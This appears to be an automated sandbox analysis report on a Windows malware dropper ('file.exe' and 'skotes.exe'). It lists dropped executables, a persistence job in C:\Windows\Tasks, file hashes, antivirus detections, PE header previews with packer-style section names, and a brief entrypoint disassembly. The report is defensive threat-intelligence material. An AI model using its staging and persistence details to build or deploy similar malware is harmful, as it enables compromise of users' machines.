Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................J...........@..........................0J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...jaliwopm....../......`..............@...chtmvbnb......I......f..............@....taggant.0....J.."...j..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1731584
Entropy (8bit):	7.9441930549490625
Encrypted:	false
SSDEEP:	49152:fWEBoMQjWfA64bV0dKsKvmKowTQ3hNrl:fZoMeuAfbV0dPKowcvrl
MD5:	B5F6786928A8020A227E44E3818EAE5E
SHA1:	01F85B42350A916F607B49C75D706568BCB56D77
SHA-256:	81114308E0A55024E29F8BEC7ADAF84006EC506B2DA4FAE3D09C7311E1665F02
SHA-512:	C32307B69E6EA906289136AAD5A0C891221B879266A4215AC46B06550F7A7515FB3FD5020908ADC654373B0E0659A341029C98C2C07FEEEDA582BFD173C34EFE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......pf...........@...........................f...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..(...$......\|..............@...asolipax......M......~..............@...akodwsqo.....`f......F..............@....taggant.0...pf.."...J..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ZiYbk6W[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1752576
Entropy (8bit):	7.935020729959646
Encrypted:	false
SSDEEP:	24576:6IjcXZj0IAWtYER7kEyyZkaMpDgaXNFBO2J2c+y0sRoVMY5h0RZ6xjldcQdJkM0P:6HmWtMJyZkJ0U/429BsV7IRZ6XaQEl
MD5:	896C86DB673D2FB674920380E608677B
SHA1:	9610E0CE21E13334718FC3B947041B4AE6199FF9
SHA-256:	5D218069316FF21E6C183D0F14624D2483EF19B0FFEC2516146EA2C66EDF1423
SHA-512:	9BA67AA91B0E9D37D49FFA18680630EA3B57E4EE42487992395337E94FA71E300B3EF5AA89D59CC73D616AE963207FF0003213067FDB605C6BC617BA8AA9C4AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb.............................`E.. ... ....@.. ........................E......'....@.................................U@..i.... .......................A...................................................................................... . ..... ...t... ..............@....rsrc........ ......................@....idata . ...@......................@... ..)..`......................@...frbjvewh.....@+.....................@...odinhcyc. ...@E.....................@....taggant.@...`E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.380978724846791
Encrypted:	false
SSDEEP:	48:SfNaoQh/TEQofNaoQlmQKfNaoQxQ+fNaoQs0UrU0U8Qh:6NnQpTEQ0NnQkQSNnQxQmNnQs0UrU0U5
MD5:	F251A066E94DE66220AA16099D94E990
SHA1:	D7C7452FEAF65D5030C26167D99851D723184437
SHA-256:	F585066DA503B2EFD44905511C870C24CC180E5F6AC641814A3B809AE68806A5
SHA-512:	BFE16607EE4F4D4577B0CAF63795FB0982567D2E8AF8E608107A31004F4E821CACCB5EE9FCC41DD5CEBC1512933D640D302699C881B19CD0B2B4E2FD19C9B1F2
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/94CB9BB26F4C19EA702265D615FEEF6C",.. "id": "94CB9BB26F4C19EA702265D615FEEF6C",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/94CB9BB26F4C19EA702265D615FEEF6C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D1D81E690A427633CEAC11518B51E7ED",.. "id": "D1D81E690A427633CEAC11518B51E7ED",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D1D81E690A427633CEAC11518B51E7ED"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2746368
Entropy (8bit):	6.508266247700136
Encrypted:	false
SSDEEP:	49152:n/DlAs8RnkkhIKuW+Bmv1+24dDU/t9C7JOy:/DlN8l5hIKur41SdGKx
MD5:	3433CA8689FA0A7F4B59713960FBDAAC
SHA1:	82BCBE51B06193064E1358C5F3E5124F3A6BC981
SHA-256:	8473C05546ACF67E533875D0DC2CB59015BFE54E3354D7081F859F43638783C4
SHA-512:	5D2BE96AF24B03BEFD5F6B096D6A382F006280E86625C09E90BB3039DDFB07B77D38C85A9A76F468CF17DB7B449A183D1B7C1548193F18DF2DBB2A26A2867C17
Malicious:	true
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`.. ...`....@.. .............................!5...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...eacxpgzo..).......)..:..............@...bagugiyz. ...@.......).............@....taggant.@...`*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1834496
Entropy (8bit):	7.947620086095118
Encrypted:	false
SSDEEP:	49152:05+SKvXhag1L9rYoMaf3nHwKUXBKTgEdjVS1:y+SKvh11VYoMafg1BSpVS1
MD5:	6C1D0DABE1EC5E928F27B3223F25C26B
SHA1:	E25AB704A6E9B3E4C30A6C1F7043598A13856AD9
SHA-256:	92228A0012605351CF08DF9A2AD4B93FA552D7A75991F81FB80F1AE854A0E57D
SHA-512:	3A3F7AF4F6018FCBD8C6F2871270504731CF269134453C9A146351C3E4A5C89165ECCCAFB3655D8B39C1FF1EC68F06E1851C0ABD66D47602E1F0F8E36D4ACFE9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................H...........@...........................H..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ubvmxkob.........z...^..............@...xdawalmh.....pH.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1752576
Entropy (8bit):	7.935020729959646
Encrypted:	false
SSDEEP:	24576:6IjcXZj0IAWtYER7kEyyZkaMpDgaXNFBO2J2c+y0sRoVMY5h0RZ6xjldcQdJkM0P:6HmWtMJyZkJ0U/429BsV7IRZ6XaQEl
MD5:	896C86DB673D2FB674920380E608677B
SHA1:	9610E0CE21E13334718FC3B947041B4AE6199FF9
SHA-256:	5D218069316FF21E6C183D0F14624D2483EF19B0FFEC2516146EA2C66EDF1423
SHA-512:	9BA67AA91B0E9D37D49FFA18680630EA3B57E4EE42487992395337E94FA71E300B3EF5AA89D59CC73D616AE963207FF0003213067FDB605C6BC617BA8AA9C4AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb.............................`E.. ... ....@.. ........................E......'....@.................................U@..i.... .......................A...................................................................................... . ..... ...t... ..............@....rsrc........ ......................@....idata . ...@......................@... ..)..`......................@...frbjvewh.....@+.....................@...odinhcyc. ...@E.....................@....taggant.@...`E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870848
Entropy (8bit):	7.948256943637
Encrypted:	false
SSDEEP:	49152:yKD0uV1wnSX/yZviIF03twYZlzy3IrS7ZNL+g9is:yedVSSXoviIy3lGYyZf
MD5:	6255D0D884765ABD3BB418F367CAA8E9
SHA1:	1E1FAF3970EBE15E3D2EB1CF45CB15B56B42DB8B
SHA-256:	CF0980521BB8139A249205FCB0FC320A43B182C694DB7F8D4E3DECA0E1C65F97
SHA-512:	1B666EBE033ADA719D3E9FEC9CDC4E4BE7BFF472FCF184BCBA41AD9D39D92B65816BC3ABBE29DCA90DE96298D27CF8FAAB2866D7DA1508AC2369528FBCCBAF35
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................J...........@..........................0J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...jaliwopm....../......`..............@...chtmvbnb......I......f..............@....taggant.0....J.."...j..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1731584
Entropy (8bit):	7.9441930549490625
Encrypted:	false
SSDEEP:	49152:fWEBoMQjWfA64bV0dKsKvmKowTQ3hNrl:fZoMeuAfbV0dPKowcvrl
MD5:	B5F6786928A8020A227E44E3818EAE5E
SHA1:	01F85B42350A916F607B49C75D706568BCB56D77
SHA-256:	81114308E0A55024E29F8BEC7ADAF84006EC506B2DA4FAE3D09C7311E1665F02
SHA-512:	C32307B69E6EA906289136AAD5A0C891221B879266A4215AC46B06550F7A7515FB3FD5020908ADC654373B0E0659A341029C98C2C07FEEEDA582BFD173C34EFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......pf...........@...........................f...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..(...$......\|..............@...asolipax......M......~..............@...akodwsqo.....`f......F..............@....taggant.0...pf.."...J..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970752
Entropy (8bit):	6.703941229502815
Encrypted:	false
SSDEEP:	24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aY8Ob:CTvC/MTQYxsWR7aY
MD5:	33E2A0EC0B8839B1DBECB8FC59CEE37A
SHA1:	B9550871DE00BD87C5E8990FF32E7771BF634905
SHA-256:	8E55D8585F852454BA66BE697EFAD31F7D0ABA3A7105587608F9A5C7F51EE4A6
SHA-512:	B25596892A989D0C7ABD7CBAFEDACDE68D258EB619C40E2775AE2FEDA2133ECB977E0497F8FC1F37D032867B4D4549105A832B2CCAAD3E903DB4230B53FABDB5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....^g..........".......... ......w.............@..........................0.......c....@...@.......@.....................d...\|....@..Le.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Le...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2746368
Entropy (8bit):	6.508266247700136
Encrypted:	false
SSDEEP:	49152:n/DlAs8RnkkhIKuW+Bmv1+24dDU/t9C7JOy:/DlN8l5hIKur41SdGKx
MD5:	3433CA8689FA0A7F4B59713960FBDAAC
SHA1:	82BCBE51B06193064E1358C5F3E5124F3A6BC981
SHA-256:	8473C05546ACF67E533875D0DC2CB59015BFE54E3354D7081F859F43638783C4
SHA-512:	5D2BE96AF24B03BEFD5F6B096D6A382F006280E86625C09E90BB3039DDFB07B77D38C85A9A76F468CF17DB7B449A183D1B7C1548193F18DF2DBB2A26A2867C17
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`.. ...`....@.. .............................!5...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...eacxpgzo..).......)..:..............@...bagugiyz. ...@.......).............@....taggant.@...`*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3028480
Entropy (8bit):	6.522411107697113
Encrypted:	false
SSDEEP:	49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
MD5:	524AFF0AE21CF7D4731596E8F3967E32
SHA1:	27A75996DFD0AE578E28613F275B0517C0BBD975
SHA-256:	A9CE24B52ECE47DFB287B912C5223C5B659DF5C2FECE87141DFA5820ECDA23FD
SHA-512:	B65D7BB349D6FEE6714BD5B92F2CDAD7E69A6D9DDEB6F4CDDC808D18A4982A5C9E3CFDAAB842667F7FB2C94A8C809AEAB5BFE229CA696152D08F3EE453D29334
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2...../y....@.................................W...k.......D.....................1...............................1..................................................... . ............................@....rsrc...D...........................@....idata ............................@...syfpipoa. +.......+.................@...kqlprvhw......1.....................@....taggant.0....1.."..................@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	13254
Entropy (8bit):	5.492155167776691
Encrypted:	false
SSDEEP:	192:4naRtLYbBp6ghj4qyaaXc6Kv8NtM5RfGNBw8dHSl:1e2qc8MOcwU0
MD5:	49A5D5E5302A05B562BFB07F4B56B1D4
SHA1:	DD0B89FA0F64C419E83A374B3CDF6D322D8FC834
SHA-256:	FBDEB270EBD2617A82F209AFBEED01B30F6D26AB9A2DE868081EB8F789432032
SHA-512:	F7C68FD589D813DBEF99D90981A74F419EF32A272320AE95C9E6CA3B464DD3FCD717F12042A9C8D0A91B15E59FC05E5EBD0EF69A2FF1E5C970C39C67C24370D8
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1734222102);..user_pref("app.update.lastUpdateTime.background-update-timer", 1734222102);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1734222102);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	13254
Entropy (8bit):	5.492155167776691
Encrypted:	false
SSDEEP:	192:4naRtLYbBp6ghj4qyaaXc6Kv8NtM5RfGNBw8dHSl:1e2qc8MOcwU0
MD5:	49A5D5E5302A05B562BFB07F4B56B1D4
SHA1:	DD0B89FA0F64C419E83A374B3CDF6D322D8FC834
SHA-256:	FBDEB270EBD2617A82F209AFBEED01B30F6D26AB9A2DE868081EB8F789432032
SHA-512:	F7C68FD589D813DBEF99D90981A74F419EF32A272320AE95C9E6CA3B464DD3FCD717F12042A9C8D0A91B15E59FC05E5EBD0EF69A2FF1E5C970C39C67C24370D8
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1734222102);..user_pref("app.update.lastUpdateTime.background-update-timer", 1734222102);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1734222102);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.383141713951904
Encrypted:	false
SSDEEP:	6:HmdTXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lzdt0:GdTf2RKQ1CGAFAjzvYRQVzdt0
MD5:	BCBC2B35A0064BBC9DB21AA3D5EFF3FA
SHA1:	B2A591DEC34DB9D5C20F58D719618DB6D5598960
SHA-256:	1D1C11F6A8552351C3D65C25E4696F1DE3AAFDF9C8AB70CBE4925B50B6DD168E
SHA-512:	DB7C9721A254A915AD857ADFF2C54A3671FD6D325B24B38CEA39B7F800EF64886DED42509613E387FB8ADCA4545264FF90142A290098224CB97FD1BD6DEDDAFF
Malicious:	false
Reputation:	unknown
Preview:	......kA...B.m.b_..5F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................:.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.522411107697113
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'028'480 bytes
MD5:	524aff0ae21cf7d4731596e8f3967e32
SHA1:	27a75996dfd0ae578e28613f275b0517c0bbd975
SHA256:	a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
SHA512:	b65d7bb349d6fee6714bd5b92f2cdad7e69a6d9ddeb6f4cddc808d18a4982a5c9e3cfdaab842667f7fb2c94a8c809aeab5bfe229ca696152d08f3ee453d29334
SSDEEP:	49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
TLSH:	49E53992B409E6CFE48A16B98427CDC26D6D07FD4B5509C3A878747EBD63CC122B5C2E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x71e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F6D18F7ED0Ah
unpcklps xmm5, dqword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31cae4	0x10	syfpipoa
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31ca94	0x18	syfpipoa
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	0f8a499b6448a9fb97322d52eceec177	False	0.9983555432561307	data	7.986233657501117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
